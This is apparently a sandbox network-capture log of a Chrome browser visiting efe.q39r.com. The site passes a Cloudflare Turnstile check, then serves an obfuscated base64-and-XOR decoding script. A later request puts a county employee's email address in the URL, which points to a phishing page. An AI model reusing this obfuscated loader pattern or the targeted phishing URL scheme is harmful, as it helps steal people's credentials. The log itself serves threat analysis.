                                                                                  2024-04-25 16:23:30 UTC1023INData Raw: 51 42 36 51 62 73 43 4f 54 78 2f 75 77 50 44 51 4c 64 38 78 55 66 42 76 59 42 35 66 37 70 42 4f 67 45 36 76 6f 41 37 2b 76 73 37 41 7a 31 44 6a 4d 6e 4e 54 48 33 4f 78 73 58 51 78 73 55 4d 44 38 6d 4d 53 49 47 49 42 63 69 54 55 6f 4f 4b 51 6b 70 4a 7a 38 51 52 6b 77 52 4e 31 73 31 4b 46 52 49 4c 6c 39 58 50 45 55 63 52 6a 4e 58 49 30 74 59 5a 56 5a 43 4a 7a 35 71 59 44 74 31 62 79 39 59 59 57 6b 33 64 6e 6c 63 4e 6e 74 74 66 55 42 68 63 34 4e 75 52 6c 52 4a 52 58 78 45 67 6d 46 70 53 6d 39 67 66 6e 36 4d 68 46 57 49 6a 30 79 62 63 6d 70 2f 55 56 79 69 6a 71 43 41 63 70 4e 66 71 61 47 48 61 71 75 57 61 6d 79 75 63 4b 4b 30 6a 35 36 6f 67 49 79 53 75 71 57 4a 6b 61 5a 33 73 70 2b 69 66 4b 2b 35 6e 6e 36 5a 70 37 61 70 77 72 75 58 69 36 57 63 70 4c 2b 63 6a
                                                                                  Data Ascii: QB6QbsCOTx/uwPDQLd8xUfBvYB5f7pBOgE6voA7+vs7Az1DjMnNTH3OxsXQxsUMD8mMSIGIBciTUoOKQkpJz8QRkwRN1s1KFRILl9XPEUcRjNXI0tYZVZCJz5qYDt1by9YYWk3dnlcNnttfUBhc4NuRlRJRXxEgmFpSm9gfn6MhFWIj0ybcmp/UVyijqCAcpNfqaGHaquWamyucKK0j56ogIySuqWJkaZ3sp+ifK+5nn6Zp7apwruXi6WcpL+cj
                                                                                  2024-04-25 16:23:30 UTC1369INData Raw: 38 65 64 0d 0a 49 30 4e 63 61 34 68 48 72 44 41 6e 30 49 43 45 59 32 75 45 6d 2b 68 7a 35 4a 69 58 2b 2b 65 4d 44 48 50 33 36 49 51 77 41 4e 50 45 59 4f 53 6f 53 50 50 73 38 4e 53 34 2b 4b 2f 30 64 46 69 41 65 46 45 59 34 4f 55 51 62 50 6b 68 50 48 7a 73 4f 4e 52 4d 75 55 42 4a 5a 4a 43 4e 55 4a 30 6f 61 55 53 34 34 59 53 38 32 59 32 42 69 4f 69 6c 47 5a 6a 5a 45 4a 6c 34 37 53 53 70 44 52 45 39 68 55 79 39 32 4d 6d 70 4e 66 58 51 35 55 6a 68 4c 63 6f 56 66 67 46 71 4a 59 32 61 4a 57 6e 35 76 66 6c 42 70 6a 57 70 69 58 31 4b 42 59 32 4f 4a 69 47 39 79 65 6d 35 76 6a 35 52 68 62 33 32 6b 64 58 75 5a 65 34 52 32 72 61 57 6c 67 36 4b 64 6a 58 39 73 67 72 46 34 65 48 4b 62 66 62 75 78 73 5a 4b 57 6d 36 2b 44 78 62 69 42 6c 34 6d 70 6a 48 2f 4e 6e 35 36 51 77
                                                                                  Data Ascii: 8edI0Nca4hHrDAn0ICEY2uEm+hz5JiX++eMDHP36IQwANPEYOSoSPPs8NS4+K/0dFiAeFEY4OUQbPkhPHzsONRMuUBJZJCNUJ0oaUS44YS82Y2BiOilGZjZEJl47SSpDRE9hUy92MmpNfXQ5UjhLcoVfgFqJY2aJWn5vflBpjWpiX1KBY2OJiG9yem5vj5Rhb32kdXuZe4R2raWlg6KdjX9sgrF4eHKbfbuxsZKWm6+DxbiBl4mpjH/Nn56Qw
                                                                                  2024-04-25 16:23:30 UTC923INData Raw: 50 38 75 33 62 47 41 6a 63 37 68 44 68 39 75 51 6b 48 52 76 61 4b 52 33 39 33 75 4d 59 2b 2f 76 77 45 66 4d 48 4a 50 55 75 42 50 63 4f 4e 76 77 48 43 78 6f 51 4c 42 34 2f 45 55 52 42 4f 55 59 6a 41 68 77 57 53 79 63 38 45 52 6f 53 4b 43 55 74 4a 79 73 6c 52 79 6b 63 56 30 34 7a 56 32 41 59 4e 31 59 76 4f 6c 46 49 61 54 4d 7a 4f 7a 74 62 4b 6d 51 77 63 6d 56 41 51 31 42 53 4e 48 68 44 4e 6c 45 76 56 57 69 42 55 55 78 74 63 45 36 45 51 56 64 58 64 32 61 46 58 59 35 76 68 45 36 51 6a 58 4e 55 6c 56 4a 30 5a 32 4e 6a 63 32 69 4e 6b 48 4a 78 57 48 61 6c 62 35 5a 78 61 4b 61 5a 64 35 39 39 62 59 6c 69 65 33 79 70 6e 49 65 7a 67 35 6d 32 71 62 43 33 68 37 75 73 6b 4a 47 4d 75 5a 57 44 74 70 75 6b 68 35 4b 66 77 48 2f 4b 7a 63 58 51 71 4e 47 67 6b 37 43 66 71 49
                                                                                  Data Ascii: P8u3bGAjc7hDh9uQkHRvaKR393uMY+/vwEfMHJPUuBPcONvwHCxoQLB4/EURBOUYjAhwWSyc8ERoSKCUtJyslRykcV04zV2AYN1YvOlFIaTMzOztbKmQwcmVAQ1BSNHhDNlEvVWiBUUxtcE6EQVdXd2aFXY5vhE6QjXNUlVJ0Z2Njc2iNkHJxWHalb5ZxaKaZd599bYlie3ypnIezg5m2qbC3h7uskJGMuZWDtpukh5KfwH/KzcXQqNGgk7CfqI
                                                                                  2024-04-25 16:23:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  25192.168.2.1749737104.17.2.1844435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:30 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1173002416:1714059007:O_UCrCaeb8fNz4-lYcCa6LDflfcxd0RCynsCpjLLiq4/879faccbfe8fb06a/f892c8713b88792 HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:23:30 UTC377INHTTP/1.1 400 Bad Request
                                                                                  Date: Thu, 25 Apr 2024 16:23:30 GMT
                                                                                  Content-Type: application/json
                                                                                  Content-Length: 7
                                                                                  Connection: close
                                                                                  cf-chl-out: kdguyo7VLo4dSerPj77qRg==$yOOD9yzgpzuZFpanmWoy8A==
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fad90a8944583-ATL
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-25 16:23:30 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                  Data Ascii: invalid


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  26192.168.2.1749738172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:30 UTC1414OUTPOST /clKkFwlBHiHVSJ8Pe6bssjJAax4UIk5BlbqZlpC0mNq48 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  Content-Length: 1313
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylXL72Bg0jYWBFEQL
                                                                                  Accept: */*
                                                                                  Origin: https://efe.q39r.com
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://efe.q39r.com/efe/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkVuTjhpYXZwWDVORVBLMVRKWWJva0E9PSIsInZhbHVlIjoieEdkZ1drMVdXMzNIV2JOSW9iQnBaaVlYcDFXNDBxWjllbm9WWGkzMWlVdlBMaU0rcC9KYkZudkRtcnk4dlEycnVrL1Y2d0hiVW5ZYkRHNEpCemNSMUpYYkJzZ0k2U2JsS1YrSEVrLzlrbDVCMHBoSkpNcTk2cnpjUldSTzcvcVIiLCJtYWMiOiJiMWMzYjljZThiNDcwMmQ0M2E3ZmQ1YTUyYTRjMjJhODc2ZjI1NDU0YzkwYzUyNDIwNWU0ZDNiYTQ3NTA5NzllIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjlhNTVJWE5STkZJenE5bTlJMGhzV1E9PSIsInZhbHVlIjoia3llOWIyNUR6ZVM0TEZVRE9jL25PZnNLTytUa0ZxQjgyQWk1cUJpVmZOcVg1YmVoMjdWR21ZK3NWbG9zalE1RzJIREZIUUExaXF2L2VxeStySnU2cWxqM1poQWQwazhwbjBLY0d3eUhOUkJIaFJ5NnFWdWVDT1Z4RkJBdWJlKzYiLCJtYWMiOiI5ZjdkNDFmYjFiMmZjMzk2NWNiN2I0MDY0ZjI3NTNhZjZlNGNiYTc2ZDA4ODAyZWJhZDQ4ZGZiODY3ODczMGUwIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:30 UTC1313OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 6c 58 4c 37 32 42 67 30 6a 59 57 42 46 45 51 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 0d 0a 0d 0a 30 2e 31 4b 56 54 33 62 51 6f 61 64 45 47 4f 48 51 56 33 33 77 6d 5f 4d 72 56 79 2d 4c 6d 79 63 75 32 66 4a 7a 4c 77 59 35 37 76 74 73 6e 66 61 42 6b 56 6c 36 4e 38 70 54 62 73 54 43 41 67 35 4c 41 50 77 50 6b 68 6b 39 44 6d 36 4f 30 46 30 7a 72 77 58 79 38 54 52 77 4c 4c 42 34 69 45 48 74 61 72 34 32 64 74 31 65 77 38 4f 61 41 49 6d 4d 6f 39 58 74 62 59 43 30 52 39 6f 75 6d 6f 62 6e 46 46 75 36 70 68 63 50 62 58 56 43 58 70 65 71 43 6d 52 71
                                                                                  Data Ascii: ------WebKitFormBoundarylXL72Bg0jYWBFEQLContent-Disposition: form-data; name="cf-turnstile-response"0.1KVT3bQoadEGOHQV33wm_MrVy-Lmycu2fJzLwY57vtsnfaBkVl6N8pTbsTCAg5LAPwPkhk9Dm6O0F0zrwXy8TRwLLB4iEHtar42dt1ew8OaAImMo9XtbYC0R9oumobnFFu6phcPbXVCXpeqCmRq
                                                                                  2024-04-25 16:23:30 UTC1005INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:30 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, private
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SASuJ8uq5kofM6ILVsBFz9F4GpK%2B8%2BCu1A2IigvoezahNBFpkkSAJrUpf8r%2FW7ZQFOJDHfneeMz1I3E9qXj2RTu%2Bm2q%2B3LxrRhfurQKSBmm%2Bx4IDItcjhWMzz%2BIQwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6ImpkKzB1R3RuTkNrTlkvMTdHL0hkL0E9PSIsInZhbHVlIjoiOEYvZEkyeHZHREhpTmZNSHFOREJaUGJzdnN4R080R3cvMXMvMVpWYmt1K3RaUmN4d0FkMUVGUURjM3N5VXQvVzYxMk9Vb1FRZG9yTHBYUllISjdQWWdKN0d2Y3p4WWYwVnJCSkgrWUZSSk4ycENobElmdUdzS0pSL0NkbEFZWHAiLCJtYWMiOiI0YTc3M2MwMTU5MjNjZWMxMmEyMWNiZWJlMDQ5YjQ1MzMwNjY0ZTE2MTVmZWFkNDRiMGExNzhmZDYzZTllNWY1IiwidGFnIjoiIn0%3D; expires=Thu, 25-Apr-2024 18:23:30 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                  2024-04-25 16:23:30 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 74 46 4f 44 46 42 53 55 64 49 61 48 4a 59 56 57 68 6e 65 56 6f 35 62 55 6f 31 61 30 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 65 6b 31 6a 55 33 56 54 54 30 56 48 63 47 45 34 56 55 78 76 62 47 78 78 61 6e 70 4b 63 6a 4e 44 53 32 74 4f 59 6a 46 32 61 57 52 74 54 6c 67 79 64 54 42 30 64 55 70 6b 53 6e 49 76 54 48 46 69 62 30 4a 75 62 32 70 4a 57 6e 56 78 63 6a 5a 46 55 47 56 33 59 7a 46 71 64 6e 4e 4a 5a 6b 46 35 63 31 70 6e 5a 32 51 30 63 47 68 78 61 46 56 6c 65 46 5a 47 52 7a 63 78 5a 6c 6b 72 64 47 35 47 53 56 4d 7a 59 58 68 49 51 7a 4d 31 63 33 52 6b 56 54 49 33 52 58 52 53 4d 45 6b 76 53 30 46 36 56 56 70 4b 65 6c 6c 35 4d 57 49
                                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IktFODFBSUdIaHJYVWhneVo5bUo1a0E9PSIsInZhbHVlIjoiek1jU3VTT0VHcGE4VUxvbGxxanpKcjNDS2tOYjF2aWRtTlgydTB0dUpkSnIvTHFib0Jub2pJWnVxcjZFUGV3YzFqdnNJZkF5c1pnZ2Q0cGhxaFVleFZGRzcxZlkrdG5GSVMzYXhIQzM1c3RkVTI3RXRSMEkvS0F6VVpKell5MWI
                                                                                  2024-04-25 16:23:30 UTC26INData Raw: 31 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 7d 0d 0a
                                                                                  Data Ascii: 14{"status":"success"}
                                                                                  2024-04-25 16:23:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  27192.168.2.1749739172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:31 UTC1451OUTGET /efe/ HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: max-age=0
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Upgrade-Insecure-Requests: 1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: navigate
                                                                                  Sec-Fetch-User: ?1
                                                                                  Sec-Fetch-Dest: document
                                                                                  Referer: https://efe.q39r.com/efe/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6ImpkKzB1R3RuTkNrTlkvMTdHL0hkL0E9PSIsInZhbHVlIjoiOEYvZEkyeHZHREhpTmZNSHFOREJaUGJzdnN4R080R3cvMXMvMVpWYmt1K3RaUmN4d0FkMUVGUURjM3N5VXQvVzYxMk9Vb1FRZG9yTHBYUllISjdQWWdKN0d2Y3p4WWYwVnJCSkgrWUZSSk4ycENobElmdUdzS0pSL0NkbEFZWHAiLCJtYWMiOiI0YTc3M2MwMTU5MjNjZWMxMmEyMWNiZWJlMDQ5YjQ1MzMwNjY0ZTE2MTVmZWFkNDRiMGExNzhmZDYzZTllNWY1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktFODFBSUdIaHJYVWhneVo5bUo1a0E9PSIsInZhbHVlIjoiek1jU3VTT0VHcGE4VUxvbGxxanpKcjNDS2tOYjF2aWRtTlgydTB0dUpkSnIvTHFib0Jub2pJWnVxcjZFUGV3YzFqdnNJZkF5c1pnZ2Q0cGhxaFVleFZGRzcxZlkrdG5GSVMzYXhIQzM1c3RkVTI3RXRSMEkvS0F6VVpKell5MWIiLCJtYWMiOiIzMjY3NDYwYjI5NjhmZmU0MTM4ODUxNmM5MjY2N2UwMDAxYmY5ODkzNTExY2E1NWZjMDQyZjc5ZjIxNWZkNDAyIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:31 UTC1009INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:31 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, private
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xr4EhsCnJRfdQR32C%2BUBALwnEl9gciuY80xOiv3P5Xpx54d1bFs3IfW%2FJLdCU%2B2jYdraSYdUGChkGQEH9E8ad3l9tcctn%2Fatjov0Lq%2BNMkb76IrLGlkDBPWs2dD0HQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6InpTcm9QdUpMMjAwRzQ4MUZzNmZsT2c9PSIsInZhbHVlIjoiZGNNNmIyQnd2M1N2RWh3WFZOdlhlQW1VSDZGUHFjK0ZmZ21HdzlKSk10UFJTcVVkVlp5ZGJEUEczeWNDSzdRb05uM3g0UExtbktqaE1FekkySmdqaXE0NzQ1VlM4Rld3TXRWYVR1dzNNUUZCdm9TZzNLSnlJNE9VUHZoMEVrYmUiLCJtYWMiOiIyOWUxNDFmNGJiNzhhYzU1ZGZmMmIzMDA4MGEyMTc3ZTAwYmIzNTcyYTU3MTUzYWU1YTdhMGQyZGQyNWIxY2NlIiwidGFnIjoiIn0%3D; expires=Thu, 25-Apr-2024 18:23:31 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                  2024-04-25 16:23:31 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 31 69 4f 55 4a 5a 54 45 4a 49 55 6a 49 35 52 7a 52 6b 52 32 70 4f 59 6b 78 47 4b 33 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 54 6c 46 72 4b 30 31 6e 55 32 78 47 4e 32 64 53 54 31 52 6c 57 6d 4e 6b 64 56 6c 48 52 55 30 30 53 33 4e 31 4d 6d 67 34 53 31 42 44 61 31 4e 34 52 6d 6c 50 51 6c 59 34 57 56 46 4d 5a 6d 70 30 53 57 70 7a 64 6d 35 57 64 32 52 6d 4b 32 70 4f 63 57 68 54 4c 30 46 35 4e 46 45 30 4e 56 42 46 51 6a 6b 78 4c 30 46 78 55 33 5a 72 65 54 52 68 4e 54 46 32 4d 45 78 51 54 32 5a 35 59 6d 5a 51 62 6a 4a 4d 63 46 64 6e 59 55 6c 79 56 55 74 6d 55 56 41 76 55 6a 4a 44 63 31 4e 75 63 6d 77 33 61 6b 39 56 56 7a 56 45 52 6b 45
                                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Im1iOUJZTEJIUjI5RzRkR2pOYkxGK3c9PSIsInZhbHVlIjoiTlFrK01nU2xGN2dST1RlWmNkdVlHRU00S3N1Mmg4S1BDa1N4RmlPQlY4WVFMZmp0SWpzdm5Wd2RmK2pOcWhTL0F5NFE0NVBFQjkxL0FxU3ZreTRhNTF2MExQT2Z5YmZQbjJMcFdnYUlyVUtmUVAvUjJDc1Nucmw3ak9VVzVERkE
                                                                                  2024-04-25 16:23:31 UTC1369INData Raw: 37 31 34 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 77 45 47 59 75 65 45 79 4a 56 28 7a 66 5a 4d 79 61 4d 6f 66 44 2c 20 50 53 72 4c 74 69 4c 69 6d 75 29 20 7b 0d 0a 6c 65 74 20 6b 72 5a 67 4c 54 4c 63 74 6e 20 3d 20 27 27 3b 0d 0a 7a 66 5a 4d 79 61 4d 6f 66 44 20 3d 20 61 74 6f 62 28 7a 66 5a 4d 79 61 4d 6f 66 44 29 3b 0d 0a 6c 65 74 20 73 61 6c 73 6e 6b 61 53 4d 6c 20 3d 20 50 53 72 4c 74 69 4c 69 6d 75 2e 6c 65 6e 67 74 68 3b 0d 0a 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 7a 66 5a 4d 79 61 4d 6f 66 44 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0d 0a 20 20 20 20 6b 72 5a 67 4c 54 4c 63 74 6e 20 2b 3d 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 7a 66 5a 4d 79 61 4d 6f 66 44 2e 63 68 61 72 43 6f
                                                                                  Data Ascii: 714<script>function wEGYueEyJV(zfZMyaMofD, PSrLtiLimu) {let krZgLTLctn = '';zfZMyaMofD = atob(zfZMyaMofD);let salsnkaSMl = PSrLtiLimu.length;for (let i = 0; i < zfZMyaMofD.length; i++) { krZgLTLctn += String.fromCharCode(zfZMyaMofD.charCo
                                                                                  2024-04-25 16:23:31 UTC450INData Raw: 50 79 30 77 48 53 6c 5a 49 78 63 65 48 6c 39 4d 4f 47 38 7a 46 6e 6f 70 58 58 59 72 42 55 35 4a 42 52 55 4e 52 46 73 50 58 6b 6b 2b 47 42 67 57 44 42 56 62 54 44 46 4a 4f 51 4e 70 41 51 6f 50 52 42 6f 4e 54 55 77 61 5a 45 51 72 56 43 31 59 42 51 67 50 62 6d 31 6a 5a 79 6c 4e 4f 33 70 45 51 78 4e 6b 55 54 46 63 48 45 34 59 4b 69 70 55 4b 31 45 38 4e 31 59 4c 54 55 51 4e 52 69 68 55 66 67 39 37 50 46 42 45 51 78 4d 7a 55 54 6b 51 47 55 46 65 43 41 78 51 4a 55 77 2b 47 78 67 59 47 42 59 47 56 57 51 46 64 77 4d 66 57 42 51 4c 46 42 30 6f 56 7a 51 56 41 6c 38 66 43 6b 31 44 4a 55 77 2f 47 68 64 62 46 56 39 75 4f 57 51 59 64 31 51 4c 4f 33 70 45 51 78 4e 6b 55 54 46 63 48 45 34 59 4b 69 70 55 4b 31 45 38 4e 31 59 58 54 56 6c 44 58 54 46 55 4f 31 30 4e 4f 33 70
                                                                                  Data Ascii: Py0wHSlZIxceHl9MOG8zFnopXXYrBU5JBRUNRFsPXkk+GBgWDBVbTDFJOQNpAQoPRBoNTUwaZEQrVC1YBQgPbm1jZylNO3pEQxNkUTFcHE4YKipUK1E8N1YLTUQNRihUfg97PFBEQxMzUTkQGUFeCAxQJUw+GxgYGBYGVWQFdwMfWBQLFB0oVzQVAl8fCk1DJUw/GhdbFV9uOWQYd1QLO3pEQxNkUTFcHE4YKipUK1E8N1YXTVlDXTFUO10NO3p
                                                                                  2024-04-25 16:23:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  28192.168.2.1749743172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:31 UTC1104OUTGET /clKkFwlBHiHVSJ8Pe6bssjJAax4UIk5BlbqZlpC0mNq48 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6ImpkKzB1R3RuTkNrTlkvMTdHL0hkL0E9PSIsInZhbHVlIjoiOEYvZEkyeHZHREhpTmZNSHFOREJaUGJzdnN4R080R3cvMXMvMVpWYmt1K3RaUmN4d0FkMUVGUURjM3N5VXQvVzYxMk9Vb1FRZG9yTHBYUllISjdQWWdKN0d2Y3p4WWYwVnJCSkgrWUZSSk4ycENobElmdUdzS0pSL0NkbEFZWHAiLCJtYWMiOiI0YTc3M2MwMTU5MjNjZWMxMmEyMWNiZWJlMDQ5YjQ1MzMwNjY0ZTE2MTVmZWFkNDRiMGExNzhmZDYzZTllNWY1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktFODFBSUdIaHJYVWhneVo5bUo1a0E9PSIsInZhbHVlIjoiek1jU3VTT0VHcGE4VUxvbGxxanpKcjNDS2tOYjF2aWRtTlgydTB0dUpkSnIvTHFib0Jub2pJWnVxcjZFUGV3YzFqdnNJZkF5c1pnZ2Q0cGhxaFVleFZGRzcxZlkrdG5GSVMzYXhIQzM1c3RkVTI3RXRSMEkvS0F6VVpKell5MWIiLCJtYWMiOiIzMjY3NDYwYjI5NjhmZmU0MTM4ODUxNmM5MjY2N2UwMDAxYmY5ODkzNTExY2E1NWZjMDQyZjc5ZjIxNWZkNDAyIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:33 UTC577INHTTP/1.1 404 Not Found
                                                                                  Date: Thu, 25 Apr 2024 16:23:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S70y7M7sbBCjNfy%2Bh18yCp7ZP%2BnBLknkOkMCIUGJfhUSN0FD0YzzOHsKROjwT3NpyoHn3yO5UkIPHBxCm9vvLsb3c8whbL4LqAjyMrGuvyJmjdL90tqIENKySvrVTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fad962c094566-ATL
                                                                                  2024-04-25 16:23:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  29192.168.2.1749740172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:31 UTC1445OUTGET /efe/?xXmaria.wojciechowski@co.monmouth.nj.us HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Upgrade-Insecure-Requests: 1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: navigate
                                                                                  Sec-Fetch-Dest: document
                                                                                  Referer: https://efe.q39r.com/efe/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
